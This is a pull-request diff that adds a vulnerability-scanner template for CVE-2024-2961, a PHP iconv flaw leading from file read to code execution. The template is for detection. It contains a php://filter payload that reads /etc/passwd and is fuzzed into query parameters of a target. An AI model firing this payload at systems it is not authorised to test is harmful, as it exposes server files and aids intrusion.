Merge pull request #10491 from kairos-hk/patch-1

Added CVE-2024-2961.yaml

dast/cves/2024/CVE-2024-2961.yaml

@@ -0,0 +1,59 @@
+id: CVE-2024-2961
+
+info:
+  name: PHP - LFR to Remote Code Execution
+  author: Kim Dongyoung (Kairos-hk),bolkv,n0ming,RoughBoy0723
+  severity: high
+  description: |
+    PHP Local File Read vulnerability leading to Remote Code Execution
+  impact: |
+    Remote attackers can execute arbitrary code on the server
+  remediation: |
+    Update PHP to the latest version and sanitize user input to prevent LFR attacks
+  reference:
+    - https://github.com/vulhub/vulhub/tree/master/php/CVE-2024-2961
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-2961
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
+    cvss-score: 7.3
+    cve-id: CVE-2024-2961
+    cwe-id: CWE-787
+    epss-score: 0.00046
+    epss-percentile: 0.17937
+  tags: cve,cve2024,php,iconv,glibc,lfr,rce,dast
+
+flow: http(1) && http(2)
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - '!regex("root:x:0:0", body)'
+        internal: true
+
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+          - 'method == "POST"'
+
+    payloads:
+      phppayload:
+        - "php://filter/read=convert.iconv.UTF-8/ISO-2022-CN-EXT/resource=/etc/passwd"
+
+    stop-at-first-match: true
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{phppayload}}"
+
+    matchers:
+      - type: regex
+        regex:
+          - "root:x:0:0"